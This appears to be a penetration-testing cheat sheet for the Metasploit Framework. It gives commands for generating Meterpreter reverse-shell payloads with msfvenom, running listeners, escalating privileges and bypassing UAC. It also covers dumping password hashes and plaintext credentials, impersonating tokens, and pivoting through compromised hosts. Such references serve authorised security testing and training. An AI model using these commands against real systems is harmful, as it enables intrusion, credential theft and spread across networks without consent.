The Metasploit Framework is an open-source penetration testing and ethical hacking tool developed by Rapid7. It provides a number of tools to exploit vulnerabilities in computer systems, networks and applications.
## MSFVenom Commands

You can use MSFVenom to generate payloads that are compatible with Metasploit.

| Task | How | Notes |
|---|---|---|
| List MSFVenom payloads | `msfvenom --list payloads` | Shows supported payloads. Stageless payloads are designated with an underscore, e.g. `windows/shell_reverse_tcp`. |
| Generate a Windows payload | `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f exe > shell-win-x64.exe` | Match the payload to the target architecture. If a 32-bit payload is executed on a 64-bit host, you will need to migrate to an x64 process before extracting hashes. |
| Create a Linux payload | `msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=6666 -f elf > shell-lin-x64` | |
## Session Management

You can use the commands below to manage sessions.

| Task | How | Notes |
|---|---|---|
| Start a handler | `use exploit/multi/handler`<br>`set LHOST 172.23.168.66`<br>`set LPORT 6666`<br>`set ExitOnSession FALSE`<br>`set PAYLOAD windows/x64/meterpreter/reverse_tcp`<br>`exploit -jz` | LHOST can be set to an interface name, such as `eth0`. `ExitOnSession FALSE` keeps the listener active after the first session connects. `exploit -jz` runs the listener as a background job. |
| Process migration | `run post/windows/manage/migrate` | Useful for stability, and to migrate from a 32-bit to a 64-bit process. |
| Session management | `sessions -i`<br>`sessions -b`<br>`sessions -u` | `-i` interacts with a session, `-b` places a session in the background, `-u` upgrades a standard reverse shell to a Meterpreter shell. |
| Channel management | `channel -i`<br>`channel -l` | `-i` interacts with a channel, `-l` lists available channels. |
| Jobs | `jobs -l`<br>`jobs -k` | Jobs are background tasks. They can be listed with `jobs -l` and killed with `jobs -k`. |
## Privilege Escalation

Some useful modules for common

| Task | How | Notes |
|---|---|---|
| Enumerate privileges | `getprivs` | Shows the currently active user's privileges. |
| Abuse weak service permissions | `use exploit/windows/local/service_permissions` | |
| Exploit unquoted service paths | `exploit/windows/local/unquoted_service_path` | |
| Search for vulnerabilities that may lead to privilege escalation | `post/multi/recon/local_exploit_suggester` | |
| List installed applications | `post/windows/gather/enum_applications` | |
| Exploit systems that have AlwaysInstallElevated set | `exploit/windows/local/always_install_elevated` | |
| Bypass UAC | `exploit/windows/local/bypassuac` | |
| Identify local AV exclusions | `post/windows/gather/enum_av_excluded` | |
## Credentials

Commands for extracting credentials.

| Task | How | Notes |
|---|---|---|
| Dump SAM database | As an administrative user:<br>`getsystem`<br>`hashdump` | Hashes can be cracked, or used for pass-the-hash attacks. |
| Extract other credentials | `load kiwi`<br>`creds_all` | May include plaintext credentials on older versions of Windows. |
| User impersonation | `load incognito`<br>`list_tokens -u`<br>`impersonate_token bordergate.local\Administrator`<br>`getuid` | Use `rev2self` to revert to the previous user context. |
| Extract Unattend.xml credentials | `use post/windows/gather/enum_unattend` | |
| Search for credentials | `search -f *.ppk` | This example looks for PuTTY key files. |
| Group Policy Preference file extraction | `post/windows/gather/credentials/gpp` | For a domain-joined system. |
## Pivoting

The next set of commands helps identify other hosts and networks that you can attack.

| Task | How | Guidance |
|---|---|---|
| Add routes | `run autoroute -s 192.168.19.0/24` | Use `run autoroute -p` to view active routes. |
| Configure a SOCKS proxy | `use auxiliary/server/socks_proxy`<br>`set VERSION 4a`<br>`set SRVPORT 9050`<br>`run` | These values should match those configured in `/etc/proxychains4.conf`. To use the proxy: `proxychains -q nmap -Pn -n -F -sT 192.168.1.1` |
| Port forward to destination | `meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1` | Forwards port 8080 on the Kali system to port 80 on 192.168.1.1. |
| Ping sweep | `use multi/gather/ping_sweep`<br>`set RHOSTS 192.168.1.0/24`<br>`set SESSION 1`<br>`run` | A quick way of mapping new subnets. |
| ARP scan | `run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24` | ARP scan of the local subnet. |
| Review network configuration | `ipconfig`<br>`netstat` | Look for active connections that may indicate trust relationships between hosts, and for previously unidentified subnets. |
| Port scan (via pivot) | `use auxiliary/scanner/portscan/tcp` | Make sure routes are added with autoroute beforehand. |
| Reverse DNS lookup | `multi/gather/dns_reverse_lookup` | Useful for finding new routed targets. |
## Metasploit Database

You can use the database to store scan results, credentials, and loot.

| Task | How | Guidance |
|---|---|---|
| Initialise the database | `systemctl start postgresql`<br>`sudo msfdb init`<br>`msf6 > db_status` | Required before the Metasploit database functionality can be used. |
| Configure a workspace | Add a new workspace: `workspace -a myworkspace`<br>List workspaces: `workspace`<br>Change workspace: `workspace myworkspace` | Workspaces keep the data from separate tests apart. |
| Nmap scanning | `db_nmap -sV -A` | Scan using standard Nmap arguments and store the results in the PostgreSQL database. |
| List database contents | `hosts`<br>`services` | Lists stored hosts and services respectively. |
| Export database contents | `services -o /tmp/services.txt`<br>`hosts -o /tmp/hosts.txt` | Exports services or hosts to a text file. |
| Set RHOSTS | `services -p 445 -R` | The example command sets RHOSTS to every host with port 445 open. This is very useful when combined with RC scripts. |
## Scripting

| Task | How | Guidance |
|---|---|---|
| Save commands | `makerc /tmp/commands.rc` | Saves the commands executed in the current session to a file. |
| Execute saved commands | `msfconsole -r /tmp/commands.rc` | Runs the saved commands. |
## Search Commands

Searching for generic terms often returns far too many results. Using search filters reduces the amount of output returned.

| Task | How | Guidance |
|---|---|---|
| Search for exploits only | `search type:exploit name:tomcat` | Type can be `exploit`, `post` or `auxiliary`. |
| Filter by platform | `search platform:windows name:gather` | |
| Remove unwanted results | `grep -v DoS grep -v local search type:exploit name:tomcat` | The `grep` filters must be placed before the `search` command. |